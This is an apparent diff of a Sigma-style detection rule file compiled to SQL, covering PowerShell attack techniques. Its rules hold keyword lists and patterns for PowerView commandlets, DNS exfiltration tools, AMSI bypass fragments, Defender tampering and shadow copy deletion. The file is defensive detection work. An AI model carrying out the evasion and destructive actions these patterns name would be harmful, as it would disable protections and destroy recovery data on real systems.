"posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", 
@@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - 
"id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + 
"filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText 
LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND 
ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 
$true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as 
used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "status": "test", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - 
"attack.t1216" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + 
